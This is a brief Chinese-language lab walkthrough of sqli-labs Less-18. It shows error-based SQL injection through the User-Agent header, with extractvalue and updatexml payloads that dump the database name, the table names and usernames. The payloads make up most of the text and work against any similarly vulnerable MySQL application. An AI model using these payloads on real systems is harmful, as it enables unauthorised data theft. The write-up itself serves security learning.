前言
作者简介:不知名白帽,网络安全学习者。
目录
less-18(UA注入)
1.爆破当前数据库
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0' and extractvalue(1,concat(0x7e,(select database()),0x7e))||'
查询到数据库名 security
2.爆破所有表名
-1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)||'
查询到表名:emails、referers、uagents、users
3.爆破users第三行数据
-1' and updatexml(1,concat(0x7e,(select username from security.users limit 2,1),0x7e ),1)--'
-1' and updatexml(1,concat(0x7e,(select username from security.users limit 1,1),0x7e ),1)--'
-1' and updatexml(1,concat(0x7e,(select username from security.users limit 0,1),0x7e ),1)--'
查询到id=3的用户名为 Dummy